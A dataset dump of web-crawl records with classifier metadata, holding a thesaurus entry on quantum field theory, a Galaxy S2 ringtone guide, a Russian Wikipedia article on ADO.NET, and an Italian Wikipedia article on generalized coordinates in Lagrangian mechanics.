"reasoning_depth": {
"primary": {
"code": "4",
"label": "Advanced Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-696,694,407,559,176,100
|
quantum field theory
(redirected from Field Quantization)
Also found in: Dictionary, Encyclopedia.
• noun
Words related to quantum field theory
the branch of quantum physics that is concerned with the theory of fields
References in periodicals archive ?
dissertation for the Massachusetts Institute of Technology (Springer Verlag, 2000) into a textbook by adding new materials and problem sets suitable for advanced undergraduate or first-year graduate students who have a basic working knowledge of canonical field quantization.
Topics covered include single-mode field quantization in a cavity, quantization of multimode fields, and coherent states.
Full browser ?
|
{
"url": "http://www.freethesaurus.com/Field+Quantization",
"source_domain": "www.freethesaurus.com",
"snapshot_id": "crawl=CC-MAIN-2017-22",
"warc_metadata": {
"Content-Length": "41057",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:JHXHZ2ZF6RTZ4GWXY3FDMQIKE46YED3P",
"WARC-Concurrent-To": "<urn:uuid:ed2c0efc-17ef-4dad-abac-27f32fe39fc9>",
"WARC-Date": "2017-05-30T09:27:03Z",
"WARC-IP-Address": "67.138.108.201",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:AT5CFV65BKX4K2UYQIL6Q6FFAKZTRH3J",
"WARC-Record-ID": "<urn:uuid:4a2a23c8-2127-41ae-ac2c-07df607ab7db>",
"WARC-Target-URI": "http://www.freethesaurus.com/Field+Quantization",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:ad69740a-f6ec-4bf5-8f59-f698c410c75d>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-185-224-210.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2017-22\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for May 2017\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
21,
22,
59,
100,
109,
110,
148,
149,
223,
224,
260,
536,
658
],
"line_end_idx": [
21,
22,
59,
100,
109,
110,
148,
149,
223,
224,
260,
536,
658,
672
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 672,
"ccnet_original_nlines": 13,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.2702702581882477,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1621621549129486,
"rps_doc_frac_unique_words": 0.7419354915618896,
"rps_doc_mean_word_length": 5.978494644165039,
"rps_doc_num_sentences": 5,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.078001499176025,
"rps_doc_word_count": 93,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.0917266234755516,
"rps_doc_frac_chars_top_3gram": 0.06474819779396057,
"rps_doc_frac_chars_top_4gram": 0,
"rps_doc_books_importance": -62.92008972167969,
"rps_doc_books_importance_length_correction": -69.3922119140625,
"rps_doc_openwebtext_importance": -35.17115783691406,
"rps_doc_openwebtext_importance_length_correction": -41.64328384399414,
"rps_doc_wikipedia_importance": -22.25550651550293,
"rps_doc_wikipedia_importance_length_correction": -28.72763442993164
},
"fasttext": {
"dclm": 0.025162819772958755,
"english": 0.8897659182548523,
"fineweb_edu_approx": 1.8457449674606323,
"eai_general_math": 0.5692870616912842,
"eai_open_web_math": 0.5584725141525269,
"eai_web_code": 0.0014876100467517972
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "530.14",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Physics",
"level_3": ""
}
},
"secondary": {
"code": "530.12",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Physics",
"level_3": ""
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "1",
"label": "Remember"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "1",
"label": "Factual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "1",
"label": "No Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "6",
"label": "Not Applicable/Indeterminate"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-7,025,896,782,285,773,000
|
How to Change Ringtone on Galaxy S2
To change the ringtone of your Samsung Galaxy S2 or other Samsung Galaxy devices do as follows:
1. Open "Setting" App
2. Go to "Sound"
3. Find "Device Ring tone" and Tap on it
4. Choose your favorite music or tone as the new Ringtone
To change the ringtone of your Samsung Galaxy S2 or other Samsung Galaxy devices do as follows: 1. Open "Setting" App 2. Go to "Sound" 3. Find ...
0 comments
Related Tips
338
How to Open RAR Files on Android
How to Open RAR Files on Android and other compressed files like Zip, TAR, GZip. Samsung Galaxy default file manager don't support compressed files, ...
Continue
|
{
"url": "http://androidwidgetcenter.com/android-tips/how-to-change-ringtone-on-galaxy-s2/",
"source_domain": "androidwidgetcenter.com",
"snapshot_id": "crawl=CC-MAIN-2020-16",
"warc_metadata": {
"Content-Length": "36034",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:F2CGNKRPGGVWMJMYICLHYKGUN3RNZJZB",
"WARC-Concurrent-To": "<urn:uuid:81968112-4a38-4f00-a24d-4d42749d9d4e>",
"WARC-Date": "2020-03-31T11:16:09Z",
"WARC-IP-Address": "104.28.8.251",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:GYHXQBY63X5ER2DFNLVUM52BS6ZRZNVD",
"WARC-Record-ID": "<urn:uuid:258d71be-34d7-4a1b-89bd-2500896f2a9b>",
"WARC-Target-URI": "http://androidwidgetcenter.com/android-tips/how-to-change-ringtone-on-galaxy-s2/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:23e323c0-4b81-4bd4-9d21-5a4d889c1f77>"
},
"warc_info": "isPartOf: CC-MAIN-2020-16\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for March/April 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-82.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
36,
37,
38,
40,
41,
43,
44,
46,
47,
49,
50,
52,
53,
149,
150,
172,
173,
190,
191,
232,
233,
291,
292,
439,
440,
451,
452,
465,
466,
470,
471,
504,
505,
658
],
"line_end_idx": [
36,
37,
38,
40,
41,
43,
44,
46,
47,
49,
50,
52,
53,
149,
150,
172,
173,
190,
191,
232,
233,
291,
292,
439,
440,
451,
452,
465,
466,
470,
471,
504,
505,
658,
666
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 666,
"ccnet_original_nlines": 34,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.251748263835907,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.0419580414891243,
"rps_doc_frac_lines_end_with_ellipsis": 0.05714286118745804,
"rps_doc_frac_no_alph_words": 0.24475523829460144,
"rps_doc_frac_unique_words": 0.48275861144065857,
"rps_doc_mean_word_length": 4.241379261016846,
"rps_doc_num_sentences": 11,
"rps_doc_symbol_to_word_ratio": 0.013986010104417801,
"rps_doc_unigram_entropy": 3.8524391651153564,
"rps_doc_word_count": 116,
"rps_doc_frac_chars_dupe_10grams": 0.4390243887901306,
"rps_doc_frac_chars_dupe_5grams": 0.5447154641151428,
"rps_doc_frac_chars_dupe_6grams": 0.5447154641151428,
"rps_doc_frac_chars_dupe_7grams": 0.5447154641151428,
"rps_doc_frac_chars_dupe_8grams": 0.4390243887901306,
"rps_doc_frac_chars_dupe_9grams": 0.4390243887901306,
"rps_doc_frac_chars_top_2gram": 0.13211381435394287,
"rps_doc_frac_chars_top_3gram": 0.04471544921398163,
"rps_doc_frac_chars_top_4gram": 0.07723577320575714,
"rps_doc_books_importance": -70.42656707763672,
"rps_doc_books_importance_length_correction": -77.8118896484375,
"rps_doc_openwebtext_importance": -36.04481506347656,
"rps_doc_openwebtext_importance_length_correction": -43.43013381958008,
"rps_doc_wikipedia_importance": -21.581621170043945,
"rps_doc_wikipedia_importance_length_correction": -28.966941833496094
},
"fasttext": {
"dclm": 0.332375705242157,
"english": 0.8147463202476501,
"fineweb_edu_approx": 1.0298188924789429,
"eai_general_math": 0.000018360000467509963,
"eai_open_web_math": 0.2810665965080261,
"eai_web_code": -0.00000763000025472138
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "004.164",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
},
"secondary": {
"code": "621.392",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Mechanical engineering and Machinery"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "1",
"label": "Factual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "1",
"label": "Truncated Snippets"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "23",
"label": "Tutorial"
},
"secondary": {
"code": "21",
"label": "Customer Support"
}
},
"reasoning_depth": {
"primary": {
"code": "1",
"label": "No Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-7,325,794,287,579,644,000
|
ADO.NET
Материал из Википедии — свободной энциклопедии
Перейти к: навигация, поиск
ADO.NET (ActiveX Data Object для .NET) — технология, предоставляющая доступ к данным для приложений, основанных на Microsoft .NET. Является не развитием более ранней технологии ADO, а самостоятельной технологией, частью фреймворка .NET. В отличие от классической ADO, которая была в основном предназначена для тесно связанных клиент-серверных систем, ADO.NET больше нацелена на автономную работу с помощью объектов DataSet. Эти типы представляют локальные копии любого количества взаимосвязанных таблиц данных, каждая из которых содержит набор строк и столбцов. Объекты DataSet позволяют вызывающей сборке (наподобие веб-страницы или программы, выполняющейся на настольном компьютере) работать с содержимым DataSet, изменять его, не требуя подключения к источнику данных, и отправлять обратно блоки измененных данных для обработки с помощью соответствующего адаптера данных. Но, пожалуй, самое фундаментальное различие между классической ADO и ADO.NET состоит в том, что ADO.NET является управляемой кодовой библиотекой, и, значит, подчиняется тем же правилам, что и любая управляемая библиотека. Типы, составляющие ADO.NET, используют протокол управления памятью CLR, принадлежат к той же системе типов (классы, интерфейсы, перечисления, структуры и делегаты), и доступ к ним возможен с помощью любого языка .NET. Классы ADO.NET находятся в сборке System.Data.dll.
Поставщики данных[править | править код]
От других API ADO.NET отличает то, что она не взаимодействует с системами управления базами данных напрямую. Вместо этого используются поставщики данных (data provider), которые инкапсулируют механизм работы с конкретной СУБД. Такой подход очень гибок, позволяет создавать адаптеры для любой СУБД и полностью использовать её особенности.
Подключаемый уровень[править | править код]
На данном уровне работа c базами данных ведётся через объекты подключения, объекты чтения данных и поставщика данных предназначенного для нужной СУБД. Для получения данных выполняются следующие шаги.
• Создание, настройка и открытие объекта подключения.
• Создание и настройка объекта команды, указывающего объект подключения в аргументе конструктора или через свойство Connection.
• Вызов метода ExecuteReader () настроенного объекта команды.
• Обработка каждой записи с помощью метода Read () объекта чтения данных.
Объекты чтения данных предоставляют поток данных, для чтения в прямом направлении. Чтение происходит каждый раз по одной записи. Следовательно объекты чтения обрабатывают только select запросы. Открытие и закрытие подключения к БД полностью возлагается на программиста.
Автономный уровень[править | править код]
Автономный уровень ADO.NET позволяет отображать реляционные данные с помощью модели объектов в память. Типы данных из System.Data воспроизводят не только отображение строк и столбцов, а также отношения между таблицами, первичные ключи и т. д. Так как отображение данных происходит в память, подключение не занимает времени СУБД, подключаясь и отключаясь автоматически, при чтении и обновлении данных, автономный уровень снимает с программиста лишнюю работу. Но у данного уровня есть недостаток, представьте что требуется считать из БД 20000 записей, и при использовании автономного уровня, все это ляжет в память приложения, не очень разумное использование, здесь на выручку приходит подключаемый уровень который считает все последовательно.
Entity Framework[править | править код]
Предыдущие уровни ADO.NET все ещё привязаны к физической структуре данных. При взаимодействии с данными необходимо помнить схемы таблиц, отношений. Общение с БД осуществляет на языке SQL, что приводит к большому объёму кода, так как язык C# сильно отличается от SQL. Entity Framework выводит абстракцию на новый уровень - объектной модели. Теперь отображение происходит на бизнес-объекты приложения, что позволяет работать с данными как с обычными объектами языка. Сущности (еntities) — это концептуальная модель физической базы данных, которая отображается на предметную область. Формально говоря, эта модель называется моделью сущностных данных (Entity Data Model — EDM). Модель EDM представляет собой набор классов клиентской стороны, которые отображаются на физическую базу данных. Тем не менее, нужно понимать, что сущности вовсе не обязаны напрямую отображаться на схему базы данных, как может показаться, исходя из названия. Сущностные классы можно реструктурировать для соответствия существующим потребностям, и исполняющая среда EF отобразит эти уникальные имена на корректную схему базы данных.
Литература[править | править код]
• Сахил Малик. Microsoft ADO.NET 2.0 для профессионалов = Pro ADO.NET 2.0. — М.: «Вильямс», 2006. — С. 560. — ISBN 1-59059-512-2.
• Эндрю Троелсен. Язык Программирования С#2010 и платформа .NET 4.0 = PRO C# 2010 AND THE .NET 4 PLATFORM. — 5-е издание. — Москва • Санкт-Петербург • Киев: «Вильямс», 2011. — С. 1392. — ISBN 978-5-8459-1682-2.
Ссылки[править | править код]
|
{
"url": "https://ru.wikipedia.org/wiki/ADO.NET",
"source_domain": "ru.wikipedia.org",
"snapshot_id": "crawl=CC-MAIN-2017-51",
"warc_metadata": {
"Content-Length": "117922",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:5UUXLOYWPJ24AVKQCTVFTKF2LXOXTRSI",
"WARC-Concurrent-To": "<urn:uuid:689654e7-ac3b-48e1-944a-68ea2b462e33>",
"WARC-Date": "2017-12-13T15:32:43Z",
"WARC-IP-Address": "208.80.154.224",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:ZKSQCXXPQS5O545H7YNETQ2UNQ5OORKR",
"WARC-Record-ID": "<urn:uuid:631ab3e3-21a8-4eae-9ea1-a4920d500589>",
"WARC-Target-URI": "https://ru.wikipedia.org/wiki/ADO.NET",
"WARC-Truncated": "length",
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:4bc2369c-4e22-431b-b89a-9d4d2554f678>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-123-210-183.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2017-51\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for December 2017\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
8,
9,
56,
84,
85,
1451,
1452,
1493,
1494,
1832,
1833,
1877,
1878,
2078,
2079,
2135,
2265,
2329,
2405,
2406,
2676,
2677,
2719,
2720,
3462,
3463,
3503,
3504,
4609,
4610,
4644,
4645,
4777,
4990,
4991
],
"line_end_idx": [
8,
9,
56,
84,
85,
1451,
1452,
1493,
1494,
1832,
1833,
1877,
1878,
2078,
2079,
2135,
2265,
2329,
2405,
2406,
2676,
2677,
2719,
2720,
3462,
3463,
3503,
3504,
4609,
4610,
4644,
4645,
4777,
4990,
4991,
5020
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 5020,
"ccnet_original_nlines": 35,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.001129940035752952,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.06779661029577255,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.9129943251609802,
"rps_doc_frac_unique_words": 0.5954887270927429,
"rps_doc_mean_word_length": 6.2827067375183105,
"rps_doc_num_sentences": 75,
"rps_doc_symbol_to_word_ratio": 0.0033898300025612116,
"rps_doc_unigram_entropy": 5.609467029571533,
"rps_doc_word_count": 665,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.014360940083861351,
"rps_doc_frac_chars_top_3gram": 0.006701769772917032,
"rps_doc_frac_chars_top_4gram": 0,
"rps_doc_books_importance": -426.4237976074219,
"rps_doc_books_importance_length_correction": -426.4237976074219,
"rps_doc_openwebtext_importance": -291.0080261230469,
"rps_doc_openwebtext_importance_length_correction": -291.0080261230469,
"rps_doc_wikipedia_importance": -211.79104614257812,
"rps_doc_wikipedia_importance_length_correction": -211.79104614257812
},
"fasttext": {
"dclm": 0.49774181842803955,
"english": 0,
"fineweb_edu_approx": 2.269505262374878,
"eai_general_math": -0.000008580000212532468,
"eai_open_web_math": 0.1425846815109253,
"eai_web_code": 0.5417752861976624
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.44",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
3,755,605,819,892,648,400
|
Coordinate generalizzate
Da Wikipedia, l'enciclopedia libera.
(Reindirizzamento da Coordinate lagrangiane)
bussola Disambiguazione – Se stai cercando altri significati, vedi Coordinate euleriane e lagrangiane.
In meccanica lagrangiana un sistema di coordinate generalizzate (o lagrangiane) è un sistema di coordinate, di numero pari o superiore ai gradi di libertà del sistema, che determina univocamente lo stato del sistema.
Definizione[modifica | modifica wikitesto]
Dato un sistema meccanico con I gradi di libertà e un qualunque sistema di coordinate, per esempio cartesiane, nel quale lo stato del sistema è indicato dal vettore \bar x=(x_d), con m\ge n, è possibile esprimere ogni variabile x_d in funzione del vettore \bar r=(r_i). Ogni r_i è detta variabile generalizzata:
\begin{cases} x_1 = \phi (r_1, \dots, r_I)\\
x_2 = \phi (r_1, \dots , r_I) \\
\dots \; \; \dots \\
x_D = \phi (r_1, \dots , r_I)
\end{cases}
dove \bar r = (r_i) \in A \subset \mathbb{R}^n con A aperto, e \bar \phi : A \longrightarrow \mathbb{R}^m è una funzione regolare. Queste devono costituire necessariamente un insieme di generatori dello spazio vettoriale I-dimensionale degli stati del sistema, mentre non è necessario che siano linearmente indipendenti. Ciò non è vero ad esempio in presenza di vincoli che legano tra di loro alcune tra le x_i. Le coordinate generalizzate possono quindi anche essere rappresentate da grandezze diverse da posizioni o angoli, per esempio dall'energia meccanica o dal volume del sistema.
Esempi[modifica | modifica wikitesto]
Un sistema di N particelle nello spazio D-dimensionale può avere fino a N D gradi di libertà, e quindi coordinate generalizzate (una per ogni dimensione del moto di ciascuna particella). Un sistema di N corpi rigidi può avere fino a 6N coordinate generalizzate nello spazio tridimensionale, includendo 3 assi di rotazione per ogni corpo. Il numero di gradi di libertà effettivi si riduce in seguito all'introduzione di vincoli tra le posizioni delle particelle (vincoli olonomi) e le velocità (vincoli anolonomi). Ad esempio un sistema formato da due particelle puntiformi nello spazio 3D ha 6 gradi di libertà (3 per ogni coordinata cartesiana di ciascuna particella), ma con l'introduzione di un vincolo, come la condizione che le particelle rimangano a distanza fissata l'una dall'altra, riduce a 5 i gradi di libertà (6 coordinate - 1 vincolo). Una scelta conveniente delle variabili lagrangiane consiste in questo caso nell'usarne tre per localizzare il centro di massa del sistema e le rimanenti due per determinare l'orientazione nello spazio della retta che congiunge le due particelle: in questo modo abbiamo 5 coordinate indipendenti tra loro.
Un corpo costretto a spostarsi lungo un vincolo unidimensionale (es. una curva regolare \phi(t), \phi:\mathbb{R} \longrightarrow \mathbb{R}^3) ha solo un grado di libertà, e la coordinata generalizzata usata il più delle volte per descriverne il moto è l'ascissa curvilinea q=t, cioè la variabile che parametrizza la curva. Da notare che un moto nelle tre dimensioni è stato ridotto ad una dimensione.
Analogamente un corpo vincolato ad una superficie ha due gradi di libertà, anche se il suo moto è ancora agganciato alle tre dimensioni. Se la superficie è una sfera, una buona scelta di coordinate è \lbrace r_1,r_2\rbrace = \lbrace \theta,\phi \rbrace , dove \theta e \phi sono le coordinate di angolo provenienti dalle coordinate sferiche. La coordinata r è stata soppressa in quanto una particella che si muove su una sfera mantiene una distanza costante dal centro della sfera.
Un doppio pendolo costretto a muoversi su un piano può essere descritto, in un sistema di assi cartesiani (x,y), con l'asse y verticale discendente, da quattro coordinate cartesiane \lbrace x_1,y_1,x_2,y_2\rbrace, ma il sistema ha solo due gradi di libertà, ed un sistema più efficiente potrebbe essere quello di considerare come variabili lagrangiane l'angolo che ciascun pendolo forma con la verticale. Ponendo \lbrace r_1,r_2\rbrace = \lbrace\theta_1,\theta_2 \rbrace otteniamo le seguenti relazioni:
\lbrace x_1, y_1 \rbrace = \lbrace l_1\sin\theta_1, l_1\cos\theta_1 \rbrace
\lbrace x_2, y_2 \rbrace = \lbrace l_1\sin\theta_1 + l_2\sin\theta_2 , l_1\cos\theta_1 + l_2\cos\theta_2 \rbrace
dove l_1 è la lunghezza del pendolo vincolato all'origine e l_2 è la lunghezza del pendolo vincolato all'estremità libera dell'altro.
Velocità generalizzata[modifica | modifica wikitesto]
Exquisite-kfind.png Per approfondire, vedi spazio delle fasi.
Ogni coordinata generalizzata r_i è associata ad una velocità generalizzata \dot r_i, definita come:
\dot r_i \stackrel{\mathrm{\Delta}}{=}{dr_i \over dt}
Nell'ipotesi che le coordinate sono linearmente indipendenti fra loro, esse dipendono solo dal tempo:
\dot r_i={\partial r_i \over \partial t}
Sia dato un sistema di N particelle in D dimensioni, quindi con al massimo ND gradi di libertà. L'n-esima particella ha come coordinata d-esima (X_{nd}), e quindi le posizioni del sistema sono rappresentabili come una matrice X \in R^{N \times D}. Si può passare ad un sistema di riferimento formato da ND coordinate generalizzate se esistono le D+1 equazioni di trasformazione tra le D coordinate cartesiane e le generalizzate:
x_d = x_d \left (r_n, t \right )
Queste equazioni possono infatti essere derivate nel tempo, ottenendo le velocità:
\dot x_d \stackrel{\mathrm{\Delta}}{=} \frac {d}{dt} x_d \left (r_n, t \right )=\sum_{i=1}^{ND}\frac{\partial x_d}{\partial r_i}{\partial r_i \over \partial t}+\frac{\partial x_d}{\partial t} = \sum_{i=1}^{ND}\frac{\partial x_d}{\partial r_i}\dot r_i+\frac{\partial x_d}{\partial t}
e quindi il vettore D-dimensionale velocità è dato da:
\dot {\bar x}_{(\dot {\bar r})} = \nabla \bar x \cdot \dot {\bar r} + \frac{\partial \bar x}{\partial t}
Quantità di moto generalizzata[modifica | modifica wikitesto]
La quantità di moto generalizzata è definita come grandezza corrispondente alle quantità di moto newtoniane:
q_i \stackrel{\mathrm{\Delta}}{=} \sum_{n = 1}^N p_n \frac{\partial \bar x_n}{\partial r_i} = \sum_{n = 1}^N m_n \dot {\bar x}_n \frac{\partial \dot {\bar x}_n}{\partial \dot r_i} = \frac{\partial {\sum_{n = 1}^N \frac{1}{2}m_n \dot {\bar x}_n^2}}{\partial \dot r_i}
Risulta che:
q_i = \frac{\partial T}{\partial \dot r_i}=\sum_{j = 1}^I H_{ij} T_{(\bar 0)} \dot r_j + \nabla_i T_{(\bar 0)}
Quest'ultima equivalenza può essere comprovata utilizzando la dimostrazione delle equazioni di Lagrange. La quantità di moto generalizzata vale dunque:
\bar q_{(\dot {\bar r})} = \bar H T_{(\bar 0)} \cdot \dot {\bar r} + \nabla T_{(\bar 0)}
Si tratta di una forma lineare dell'energia cinetica nelle velocità generalizzate. Per un sistema olonomo, in particolare, risulta:
\bar q_{(\dot {\bar r})} = \bar H T_{(\bar 0)} \cdot \dot {\bar r}
Si deve porre attenzione nel legare quantità di moto generalizzate e forze generalizzate, in quanto le quantità di moto lagrangiane sono in base alle equazioni di Lagrange del I tipo:
q_i = \int F_i - \frac{\partial T}{\partial r_i} dt = p_i - \int \frac{\partial T}{\partial r_i} dt
e differiscono quindi per il secondo termine - \int\frac{\partial T}{\partial r_i} dt dal momento coniugato p_i = \int F_i dt cui si arriverebbe tentando di generalizzare la definizione newtoniana di forza come derivata totale temporale della quantità di moto, cioè il secondo principio della dinamica.
In coordinate cartesiane, la quantità di moto generalizzata ritorna chiaramente la quantità di moto semplice, mentre in coordinate sferiche diventa il momento angolare. In generale però non ne è sempre possibile una interpretazione intuitiva.
Energia cinetica in coordinate generalizzate[modifica | modifica wikitesto]
L'energia cinetica di N particelle è data in meccanica newtoniana D-dimensionale come:
T : \R^{N D} \to \R
T_{(\dot {\bar x})} \stackrel{\mathrm{\Delta}}{=} \frac {1}{2} \sum_{n=1}^{N} m_n \dot {\bar x}_n \cdot \dot {\bar x}_n
Esprimendo gli N vettori posizione newtoniani \bar x_{(\bar r)} (delle particelle rispetto ai D assi cartesiani) in funzione delle I coordinate lagrangiane r_i:
T_{(\dot {\bar r})}=\frac {1}{2} \sum_{n=1}^{N}m_n \left(\frac{\partial \bar x_n}{\partial t} + \sum_{i=1}^{I}\frac{\partial \bar x_n}{\partial r_i}\dot r_i\right)\cdot \left(\frac{\partial \bar x_n}{\partial t} + \sum_{j=1}^{I}\frac{\partial \bar x_n}{\partial r_j}\dot r_j\right) .
Svolgendo e raccogliendo nelle velocità generalizzate \dot r_i:
T_{(\dot {\bar r})}= \frac{1}{2} \sum_{n = 1}^N {m_n} (\frac{\partial \bar x_n}{\partial t})^2+ \sum_{i=1}^{I}\sum_{n = 1}^N {m_n} \frac{(\partial \bar x_n)^2}{\partial r_i \partial t} \dot r_i + \frac{1}{2}\sum_{i, j=1}^{I} \sum_{n = 1}^N {m_n} \frac{(\partial \bar x_n)^2}{\partial r_i \partial r_j} \dot r_i \dot r_j
